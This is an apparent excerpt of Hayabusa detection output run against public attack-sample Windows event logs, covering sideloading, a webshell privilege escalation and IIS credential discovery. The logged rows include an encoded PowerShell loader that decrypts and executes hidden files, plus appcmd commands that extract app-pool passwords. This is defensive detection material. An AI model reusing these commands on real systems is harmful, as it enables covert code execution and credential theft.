+2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""  :  Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe""  :  Path: C:\Windows\System32\notepad.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe""  list vdir /text:physicalpath  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppools /text:name  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc 